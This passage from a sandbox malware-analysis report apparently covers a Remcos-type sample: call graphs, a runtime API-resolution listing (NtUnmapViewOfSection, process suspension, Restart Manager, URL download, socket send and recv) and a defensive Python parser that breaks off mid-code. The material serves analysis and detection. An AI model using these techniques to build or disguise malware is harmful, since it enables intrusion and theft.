402fa5 28 API calls 48053->48811 48054 40dbdb 48815 402fa5 28 API calls 48054->48815 48812 402fa5 28 API calls 48055->48812 48059 40db2f 48063 401f13 28 API calls 48059->48063 48060 40dadd 48064 401f13 28 API calls 48060->48064 48061 40dbe5 48062 401f09 11 API calls 48061->48062 48065 40dbef 48062->48065 48066 40db3a 48063->48066 48067 40dae8 48064->48067 48068 401f09 11 API calls 48065->48068 48069 401f09 11 API calls 48066->48069 48070 401f09 11 API calls 48067->48070 48071 40dbf8 48068->48071 48072 40db43 48069->48072 48073 40daf1 48070->48073 48074 401f09 11 API calls 48071->48074 48075 401f09 11 API calls 48072->48075 48076 401f09 11 API calls 48073->48076 48077 40dc01 48074->48077 48075->48040 
48076->48040 48078 401f09 11 API calls 48077->48078 48079 40dc0a 48078->48079 48080 401f09 11 API calls 48079->48080 48081 40dc13 48080->48081 48081->47451 48082->47465 48083->47486 48085 41371e RegQueryValueExA RegCloseKey 48084->48085 48086 413742 48084->48086 48085->48086 48086->47444 48087->47480 48092 4344ef 48088->48092 48089 43bd51 ___std_exception_copy 21 API calls 48089->48092 48090 40f0d1 48090->47517 48092->48089 48092->48090 48816 442f80 7 API calls 2 library calls 48092->48816 48817 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48092->48817 48818 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48092->48818 48095->47548 48096->47536 48098->47580 48099->47385 48102 41b4c5 LoadResource LockResource SizeofResource 48101->48102 48103 40f3de 48101->48103 48102->48103 48104 43bd51 48103->48104 48109 446137 ___crtLCMapStringA 48104->48109 48105 446175 48121 4405dd 20 API calls _Atexit 48105->48121 48106 446160 RtlAllocateHeap 48108 446173 48106->48108 48106->48109 48108->47690 48109->48105 48109->48106 48120 442f80 7 API calls 2 library calls 48109->48120 48112 4020bf 48111->48112 48122 4023ce 48112->48122 48114 4020ca 48126 40250a 48114->48126 48116 4020d9 48116->47693 48118 4020b7 28 API calls 48117->48118 48119 406dec 48118->48119 48119->47700 48120->48109 48121->48108 48123 4023d8 48122->48123 48124 402428 48122->48124 48123->48124 48133 4027a7 11 API calls std::_Deallocate 48123->48133 48124->48114 48127 40251a 48126->48127 48128 402520 48127->48128 48129 402535 48127->48129 48134 402569 48128->48134 48144 4028e8 48129->48144 48132 402533 48132->48116 48133->48124 48155 402888 48134->48155 48136 40257d 48137 402592 48136->48137 48138 4025a7 48136->48138 48160 402a34 22 API calls 48137->48160 48140 4028e8 28 API calls 48138->48140 48143 4025a5 48140->48143 48141 40259b 48161 4029da 22 API calls 48141->48161 48143->48132 48145 4028f1 48144->48145 48146 402953 48145->48146 48147 4028fb 48145->48147 
48169 4028a4 22 API calls 48146->48169 48150 402904 48147->48150 48151 402917 48147->48151 48163 402cae 48150->48163 48153 402915 48151->48153 48154 4023ce 11 API calls 48151->48154 48153->48132 48154->48153 48156 402890 48155->48156 48157 402898 48156->48157 48162 402ca3 22 API calls 48156->48162 48157->48136 48160->48141 48161->48143 48164 402cb8 __EH_prolog 48163->48164 48170 402e54 22 API calls 48164->48170 48166 4023ce 11 API calls 48168 402d92 48166->48168 48167 402d24 48167->48166 48168->48153 48170->48167 48172 4020e7 48171->48172 48173 4023ce 11 API calls 48172->48173 48174 4020f2 48173->48174 48174->47709 48180 40423a 48175->48180 48178->47709 48179->47728 48181 404243 48180->48181 48182 4023ce 11 API calls 48181->48182 48183 40424e 48182->48183 48184 402569 28 API calls 48183->48184 48185 4041b5 48184->48185 48185->47709 48186->47732 48187->47736 48188->47738 48192 4032aa 48190->48192 48191 4032c9 48191->47748 48192->48191 48193 4028e8 28 API calls 48192->48193 48193->48191 48195 4051fb 48194->48195 48204 405274 48195->48204 48197 405208 48197->47751 48199 402061 48198->48199 48200 4023ce 11 API calls 48199->48200 48201 40207b 48200->48201 48226 40267a 48201->48226 48205 405282 48204->48205 48206 405288 48205->48206 48207 40529e 48205->48207 48215 4025f0 48206->48215 48209 4052f5 48207->48209 48210 4052b6 48207->48210 48224 4028a4 22 API calls 48209->48224 48213 4028e8 28 API calls 48210->48213 48214 40529c 48210->48214 48213->48214 48214->48197 48216 402888 22 API calls 48215->48216 48217 402602 48216->48217 48218 402672 48217->48218 48219 402629 48217->48219 48225 4028a4 22 API calls 48218->48225 48222 4028e8 28 API calls 48219->48222 48223 40263b 48219->48223 48222->48223 48223->48214 48227 40268b 48226->48227 48228 4023ce 11 API calls 48227->48228 48229 40208d 48228->48229 48229->47754 48230->47762 48231->47767 48234 41bfc4 GetCurrentProcess 48233->48234 48235 41b2d1 48233->48235 48234->48235 48236 4135a6 RegOpenKeyExA 48235->48236 48237 4135d4 
RegQueryValueExA RegCloseKey 48236->48237 48238 4135fe 48236->48238 48237->48238 48239 402093 28 API calls 48238->48239 48240 413613 48239->48240 48240->47778 48241->47789 48243 40b90c 48242->48243 48248 402252 48243->48248 48245 40b917 48252 40b92c 48245->48252 48247 40b926 48247->47797 48249 40225c 48248->48249 48250 4022ac 48248->48250 48249->48250 48259 402779 11 API calls std::_Deallocate 48249->48259 48250->48245 48253 40b966 48252->48253 48254 40b938 48252->48254 48271 4028a4 22 API calls 48253->48271 48260 4027e6 48254->48260 48258 40b942 48258->48247 48259->48250 48261 4027ef 48260->48261 48262 402851 48261->48262 48263 4027f9 48261->48263 48273 4028a4 22 API calls 48262->48273 48266 402802 48263->48266 48267 402815 48263->48267 48272 402aea 28 API calls __EH_prolog 48266->48272 48269 402813 48267->48269 48270 402252 11 API calls 48267->48270 48269->48258 48270->48269 48272->48269 48274->47800 48276 402347 48275->48276 48277 402252 11 API calls 48276->48277 48278 4023c7 48277->48278 48278->47800 48280 4024f9 48279->48280 48281 40250a 28 API calls 48280->48281 48282 4020b1 48281->48282 48282->47457 48299 43ba0a 48283->48299 48285 43ae50 48305 43a7b7 36 API calls 3 library calls 48285->48305 48287 43ae15 48287->48285 48288 43ae2a 48287->48288 48298 43ae2f _strftime 48287->48298 48304 4405dd 20 API calls _Atexit 48288->48304 48291 43ae5c 48292 43ae8b 48291->48292 48306 43ba4f 40 API calls __Tolower 48291->48306 48295 43aef7 48292->48295 48307 43b9b6 20 API calls 2 library calls 48292->48307 48308 43b9b6 20 API calls 2 library calls 48295->48308 48296 43afbe _strftime 48296->48298 48309 4405dd 20 API calls _Atexit 48296->48309 48298->47835 48300 43ba22 48299->48300 48301 43ba0f 48299->48301 48300->48287 48310 4405dd 20 API calls _Atexit 48301->48310 48303 43ba14 _strftime 48303->48287 48304->48298 48305->48291 48306->48291 48307->48295 48308->48296 48309->48298 48310->48303 48317 401fb0 48311->48317 48313 402f1e 48314 402055 11 API calls 48313->48314 48315 
402f2d 48314->48315 48315->47849 48316->47852 48318 4025f0 28 API calls 48317->48318 48319 401fbd 48318->48319 48319->48313 48321 40a127 48320->48321 48322 413549 3 API calls 48321->48322 48323 40a12e 48322->48323 48324 40a142 48323->48324 48325 40a15c 48323->48325 48326 409e9b 48324->48326 48327 40a147 48324->48327 48328 40905c 28 API calls 48325->48328 48326->47509 48341 40905c 48327->48341 48330 40a16a 48328->48330 48348 40a179 86 API calls 48330->48348 48334 40a15a 48334->48326 48335->47876 48365 403222 48336->48365 48338 403022 48369 403262 48338->48369 48342 409072 48341->48342 48343 402252 11 API calls 48342->48343 48344 40908c 48343->48344 48349 404267 48344->48349 48346 40909a 48347 40a22d 29 API calls 48346->48347 48347->48334 48361 40a273 163 API calls 48347->48361 48348->48326 48362 40a267 86 API calls 48348->48362 48363 40a289 48 API calls 48348->48363 48364 40a27d 128 API calls 48348->48364 48350 402888 22 API calls 48349->48350 48351 40427b 48350->48351 48352 404290 48351->48352 48353 4042a5 48351->48353 48359 4042df 22 API calls 48352->48359 48355 4027e6 28 API calls 48353->48355 48358 4042a3 48355->48358 48356 404299 48360 402c48 22 API calls 48356->48360 48358->48346 48359->48356 48360->48358 48366 40322e 48365->48366 48375 403618 48366->48375 48368 40323b 48368->48338 48370 40326e 48369->48370 48371 402252 11 API calls 48370->48371 48372 403288 48371->48372 48373 402336 11 API calls 48372->48373 48374 403031 48373->48374 48374->47881 48376 403626 48375->48376 48377 403644 48376->48377 48378 40362c 48376->48378 48380 40369e 48377->48380 48382 40365c 48377->48382 48386 4036a6 28 API calls 48378->48386 48387 4028a4 22 API calls 48380->48387 48384 4027e6 28 API calls 48382->48384 48385 403642 48382->48385 48384->48385 48385->48368 48386->48385 48389 404186 48388->48389 48390 402252 11 API calls 48389->48390 48391 404191 48390->48391 48399 4041bc 48391->48399 48394 4042fc 48410 404353 48394->48410 48396 40430a 48397 403262 11 API calls 48396->48397 
48398 404319 48397->48398 48398->47890 48400 4041c8 48399->48400 48403 4041d9 48400->48403 48402 40419c 48402->48394 48404 4041e9 48403->48404 48405 404206 48404->48405 48406 4041ef 48404->48406 48407 4027e6 28 API calls 48405->48407 48408 404267 28 API calls 48406->48408 48409 404204 48407->48409 48408->48409 48409->48402 48411 40435f 48410->48411 48414 404371 48411->48414 48413 40436d 48413->48396 48415 40437f 48414->48415 48416 404385 48415->48416 48417 40439e 48415->48417 48480 4034e6 28 API calls 48416->48480 48418 402888 22 API calls 48417->48418 48419 4043a6 48418->48419 48421 404419 48419->48421 48422 4043bf 48419->48422 48481 4028a4 22 API calls 48421->48481 48425 4027e6 28 API calls 48422->48425 48433 40439c 48422->48433 48425->48433 48433->48413 48480->48433 48488 43aa9a 48482->48488 48486 4138b9 48485->48486 48487 41388f RegSetValueExA RegCloseKey 48485->48487 48486->47909 48487->48486 48491 43aa1b 48488->48491 48490 40170d 48490->47907 48492 43aa2a 48491->48492 48494 43aa3e 48491->48494 48497 4405dd 20 API calls _Atexit 48492->48497 48496 43aa2f __alldvrm _strftime 48494->48496 48498 448957 11 API calls 2 library calls 48494->48498 48496->48490 48497->48496 48498->48496 48502 41b8f9 ctype ___scrt_fastfail 48499->48502 48500 402093 28 API calls 48501 414f49 48500->48501 48501->47915 48502->48500 48503->47932 48505 414f02 getaddrinfo WSASetLastError 48504->48505 48506 414ef8 48504->48506 48505->47984 48655 414d86 29 API calls ___std_exception_copy 48506->48655 48508 414efd 48508->48505 48510 404846 socket 48509->48510 48511 404839 48509->48511 48512 404860 CreateEventW 48510->48512 48513 404842 48510->48513 48656 40489e WSAStartup 48511->48656 48512->47984 48513->47984 48515 40483e 48515->48510 48515->48513 48517 404f65 48516->48517 48518 404fea 48516->48518 48519 404f6e 48517->48519 48520 404fc0 CreateEventA CreateThread 48517->48520 48521 404f7d GetLocalTime 48517->48521 48518->47984 48519->48520 48520->48518 48658 405150 48520->48658 48522 41bb8e 28 
API calls 48521->48522 48523 404f91 48522->48523 48657 4052fd 28 API calls 48523->48657 48532 404a1b 48531->48532 48533 4048ee 48531->48533 48534 40497e 48532->48534 48535 404a21 WSAGetLastError 48532->48535 48533->48534 48536 404923 48533->48536 48539 40531e 28 API calls 48533->48539 48534->47984 48535->48534 48537 404a31 48535->48537 48662 420c60 27 API calls 48536->48662 48540 404932 48537->48540 48541 404a36 48537->48541 48543 40490f 48539->48543 48546 402093 28 API calls 48540->48546 48667 41cae1 30 API calls 48541->48667 48542 40492b 48542->48540 48545 404941 48542->48545 48547 402093 28 API calls 48543->48547 48556 404950 48545->48556 48557 404987 48545->48557 48549 404a80 48546->48549 48550 40491e 48547->48550 48548 404a40 48668 4052fd 28 API calls 48548->48668 48553 402093 28 API calls 48549->48553 48554 41b4ef 80 API calls 48550->48554 48558 404a8f 48553->48558 48554->48536 48561 402093 28 API calls 48556->48561 48664 421a40 54 API calls 48557->48664 48562 41b4ef 80 API calls 48558->48562 48565 40495f 48561->48565 48562->48534 48564 40498f 48567 4049c4 48564->48567 48568 404994 48564->48568 48569 402093 28 API calls 48565->48569 48666 420e06 28 API calls 48567->48666 48571 402093 28 API calls 48568->48571 48572 40496e 48569->48572 48574 4049a3 48571->48574 48575 41b4ef 80 API calls 48572->48575 48578 402093 28 API calls 48574->48578 48579 404973 48575->48579 48576 4049cc 48577 4049f9 CreateEventW CreateEventW 48576->48577 48580 402093 28 API calls 48576->48580 48577->48534 48581 4049b2 48578->48581 48663 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48579->48663 48582 4049e2 48580->48582 48583 41b4ef 80 API calls 48581->48583 48585 402093 28 API calls 48582->48585 48586 4049b7 48583->48586 48587 4049f1 48585->48587 48665 4210b2 52 API calls 48586->48665 48589 41b4ef 80 API calls 48587->48589 48590 4049f6 48589->48590 48590->48577 48669 41b7b6 GlobalMemoryStatusEx 48591->48669 48593 41b7f5 48593->47984 48670 414580 48594->48670 
48598 441e8d 48597->48598 48700 441c7d 48598->48700 48600 441eae 48600->47984 48602 40dda5 48601->48602 48603 4134ff 3 API calls 48602->48603 48605 40ddac 48603->48605 48604 40ddc4 48604->47984 48605->48604 48606 413549 3 API calls 48605->48606 48606->48604 48608 4020b7 28 API calls 48607->48608 48609 41bc57 48608->48609 48609->47984 48611 41bd2b 48610->48611 48612 4020b7 28 API calls 48611->48612 48613 41bd3d 48612->48613 48613->47984 48615 441e81 20 API calls 48614->48615 48616 41bbb2 48615->48616 48617 402093 28 API calls 48616->48617 48618 41bbc0 48617->48618 48618->47984 48620 41bafc GetTickCount 48619->48620 48620->48000 48622 436e90 ___scrt_fastfail 48621->48622 48623 41bab5 GetForegroundWindow GetWindowTextW 48622->48623 48624 40417e 28 API calls 48623->48624 48625 41badf 48624->48625 48625->48000 48627 402093 28 API calls 48626->48627 48628 40f8f6 48627->48628 48628->48000 48629->48000 48631 4020df 11 API calls 48630->48631 48632 404c27 48631->48632 48633 4020df 11 API calls 48632->48633 48637 404c30 48633->48637 48634 43bd51 ___std_exception_copy 21 API calls 48634->48637 48636 404c96 48636->48637 48639 404ca1 48636->48639 48637->48634 48637->48636 48638 4020b7 28 API calls 48637->48638 48640 401fe2 28 API calls 48637->48640 48643 401fd8 11 API calls 48637->48643 48705 404cc3 48637->48705 48717 404b96 57 API calls 48637->48717 48638->48637 48718 404e26 99 API calls 48639->48718 48640->48637 48642 404ca8 48644 401fd8 11 API calls 48642->48644 48643->48637 48645 404cb1 48644->48645 48646 401fd8 11 API calls 48645->48646 48647 404cba 48646->48647 48647->47959 48649->47984 48650->47959 48652->48000 48653->47959 48654->47959 48655->48508 48656->48515 48661 40515c 102 API calls 48658->48661 48660 405159 48661->48660 48662->48542 48663->48534 48664->48564 48665->48579 48666->48576 48667->48548 48669->48593 48673 414553 48670->48673 48674 414568 ___scrt_initialize_default_local_stdio_options 48673->48674 48677 43f79d 48674->48677 48680 43c4f0 48677->48680 48681 
43c530 48680->48681 48682 43c518 48680->48682 48681->48682 48684 43c538 48681->48684 48695 4405dd 20 API calls _Atexit 48682->48695 48696 43a7b7 36 API calls 3 library calls 48684->48696 48686 43c548 48697 43cc76 20 API calls 2 library calls 48686->48697 48687 43c51d _strftime 48689 434fcb TranslatorGuardHandler 5 API calls 48687->48689 48691 414576 48689->48691 48690 43c5c0 48698 43d2e4 51 API calls 3 library calls 48690->48698 48691->47984 48694 43c5cb 48699 43cce0 20 API calls _free 48694->48699 48695->48687 48696->48686 48697->48690 48698->48694 48699->48687 48701 441c94 48700->48701 48703 441ccb _strftime 48701->48703 48704 4405dd 20 API calls _Atexit 48701->48704 48703->48600 48704->48703 48706 4020df 11 API calls 48705->48706 48710 404cde 48706->48710 48707 404e13 48708 401fd8 11 API calls 48707->48708 48709 404e1c 48708->48709 48709->48636 48710->48707 48711 401fd8 11 API calls 48710->48711 48712 401fc0 28 API calls 48710->48712 48713 4020f6 28 API calls 48710->48713 48715 4041a2 28 API calls 48710->48715 48716 401fe2 28 API calls 48710->48716 48711->48710 48714 404dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 48712->48714 48713->48710 48714->48710 48719 415aea 48714->48719 48715->48710 48716->48710 48717->48637 48718->48642 48720 4020f6 28 API calls 48719->48720 48721 415b0c SetEvent 48720->48721 48722 415b21 48721->48722 48723 4041a2 28 API calls 48722->48723 48724 415b3b 48723->48724 48725 4020f6 28 API calls 48724->48725 48726 415b4b 48725->48726 48727 4020f6 28 API calls 48726->48727 48728 415b5d 48727->48728 48729 41be1b 28 API calls 48728->48729 48730 415b66 48729->48730 48731 417089 48730->48731 48732 415b86 GetTickCount 48730->48732 48733 415d2f 48730->48733 48734 401e8d 11 API calls 48731->48734 48735 41bb8e 28 API calls 48732->48735 48733->48731 48797 415ce5 48733->48797 48736 417092 48734->48736 48737 415b97 48735->48737 48739 401fd8 11 API calls 48736->48739 48740 41bae6 GetTickCount 48737->48740 48741 41709e 
48739->48741 48742 415ba3 48740->48742 48743 401fd8 11 API calls 48741->48743 48744 41bb8e 28 API calls 48742->48744 48745 4170aa 48743->48745 48746 415bae 48744->48746 48747 41ba96 30 API calls 48746->48747 48748 415bbc 48747->48748 48749 41bd1e 28 API calls 48748->48749 48750 415bca 48749->48750 48751 401e65 22 API calls 48750->48751 48752 415bd8 48751->48752 48798 402f31 28 API calls 48752->48798 48754 415be6 48799 402ea1 28 API calls 48754->48799 48756 415bf5 48757 402f10 28 API calls 48756->48757 48758 415c04 48757->48758 48800 402ea1 28 API calls 48758->48800 48760 415c13 48761 402f10 28 API calls 48760->48761 48762 415c1f 48761->48762 48801 402ea1 28 API calls 48762->48801 48764 415c29 48802 404aa1 61 API calls ctype 48764->48802 48766 415c38 48767 401fd8 11 API calls 48766->48767 48768 415c41 48767->48768 48769 401fd8 11 API calls 48768->48769 48770 415c4d 48769->48770 48771 401fd8 11 API calls 48770->48771 48772 415c59 48771->48772 48773 401fd8 11 API calls 48772->48773 48774 415c65 48773->48774 48775 401fd8 11 API calls 48774->48775 48776 415c71 48775->48776 48777 401fd8 11 API calls 48776->48777 48778 415c7d 48777->48778 48779 401f09 11 API calls 48778->48779 48780 415c86 48779->48780 48781 401fd8 11 API calls 48780->48781 48782 415c8f 48781->48782 48783 401fd8 11 API calls 48782->48783 48784 415c98 48783->48784 48785 401e65 22 API calls 48784->48785 48786 415ca3 48785->48786 48787 43baac _strftime 40 API calls 48786->48787 48788 415cb0 48787->48788 48789 415cb5 48788->48789 48790 415cdb 48788->48790 48792 415cc3 48789->48792 48793 415cce 48789->48793 48791 401e65 22 API calls 48790->48791 48791->48797 48803 404ff4 82 API calls 48792->48803 48794 404f51 105 API calls 48793->48794 48796 415cc9 48794->48796 48796->48731 48797->48731 48804 4050e4 84 API calls 48797->48804 48798->48754 48799->48756 48800->48760 48801->48764 48802->48766 48803->48796 48804->48796 48807 401f8e 48806->48807 48808 402252 11 API calls 48807->48808 48809 401f99 48808->48809 
Execution graph (rendered as an interactive graph in the original report; only the nodes that reach Windows APIs are kept here):
• 40f7c2 loop: 413549 (RegOpenKeyExA, RegQueryValueExA, RegCloseKey), Sleep at 40f856, 40905c, 41bc5e, 413814, 401f09, 402093, 41376f, 40d096 (112 API calls), then 412850 (TerminateProcess, WaitForSingleObject) and ExitProcess at 40f8c8; 4127ee (62 API calls)
• 4269e6 cluster: 424edd, 41fb6c, 426155, 4256f0, 425ae1 -> 41ebbb, 4205d8, 424d05, 41da5f, 432ec4 (___std_exception_copy)
• 415d06 -> 41b380: 4020df, 43bd51, InternetOpenW and InternetOpenUrlW at 41b39e, InternetReadFile loop at 41b3c5, InternetCloseHandle * 2 at 41b415; 404aa1 (61 API calls)
• 426c4b: send at 426cc8; 426bdc: recv at 426cb1
• 44375d -> 44f3dd: GetEnvironmentStringsW, FreeEnvironmentStringsW, 446137 (RtlAllocateHeap), _free, _Atexit (CRT environment setup)
• 43be58: _swprintf, EnterCriticalSection at 445888, LeaveCriticalSection at 43becf, std::_Lockit
• 41dfbd -> 41db62 (DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection) -> 43354a -> 433469 -> 433837: CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
• 40165e: operator new (4344ea); 42f8ed -> 432eee -> 440f0d -> 446185: RtlReAllocateHeap

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                            • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                            • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                            • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                            • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                            • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                            • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                            • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad$HandleModule
                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                            • API String ID: 4236061018-3687161714
                            • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                            • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                            • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                            • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
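The listing above is the sample's runtime import resolver: every capability-bearing API is fetched with LoadLibraryA/GetModuleHandleA followed by GetProcAddress, so none of them appear in the import table. The script below is an added example (not part of the Joe Sandbox report or the Remcos sample) that turns such a listing into a module/symbol table and tags the symbols with what they enable. It assumes the sandbox's convention that the stack slot after the module name is the symbol the next GetProcAddress resolves; on a few lines of the original listing (for example user32 / SetProcessDpiAwareness) that slot may simply be carried over from the previous call, so the output records the slot as captured and a reviewer should confirm such entries against the disassembly. The Shlwapi entry shows an 8-digit value (0000000C) instead of a name, which the parser treats as an ordinal import (#12). Sample input lines are copied from the listing above; the capability descriptions are standard Windows API semantics, not something the report states.

```python
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed input: lines copied from the 0041CB50 "APIs" listing above.
SAMPLE_LISTING = """\
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
• GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
• GetProcAddress.KERNEL32(00000000), ref: 0041CB88
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
• GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
• GetProcAddress.KERNEL32(00000000), ref: 0041CC86
• LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
• GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
"""

# One sandbox API line: "<Api>.<Module>(<args>), ref: <addr>"
LINE_RE = re.compile(
    r"(?P<api>LoadLibraryA|GetModuleHandleA|GetProcAddress)\.\w+"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# An 8-hex-digit stack slot where a name is expected is an ordinal, not a string.
ORDINAL_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


class ResolvedImport(NamedTuple):
    module: str   # normalised to lower case ("Kernel32" and "kernel32" are the same DLL)
    symbol: str   # exported name as captured, or "#<n>" for an ordinal import
    ref: int      # address of the GetProcAddress call that completed the lookup


def _symbol_from_slot(slot: str) -> str:
    if ORDINAL_RE.match(slot):
        return f"#{int(slot, 16)}"
    return slot


def parse_resolver(listing: str) -> List[ResolvedImport]:
    """Pair each LoadLibraryA/GetModuleHandleA line with the GetProcAddress that follows it."""
    pending: Optional[Tuple[str, str]] = None
    resolved: List[ResolvedImport] = []
    for line in listing.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")]
        if m.group("api") in ("LoadLibraryA", "GetModuleHandleA"):
            if len(args) < 2:
                continue
            pending = (args[0].lower(), _symbol_from_slot(args[1]))
        elif pending is not None:  # GetProcAddress: consumes the pending module/symbol
            resolved.append(ResolvedImport(pending[0], pending[1], int(m.group("ref"), 16)))
            pending = None
    return resolved


# Standard semantics of the resolved APIs; None for symbols we cannot name (ordinals).
CAPABILITY: Dict[str, str] = {
    "GetProcessImageFileNameW": "resolve a process handle to its image path",
    "NtUnmapViewOfSection": "unmap a mapped section in a target process (hollowing primitive)",
    "NtSuspendProcess": "suspend every thread of a process",
    "NtResumeProcess": "resume a suspended process",
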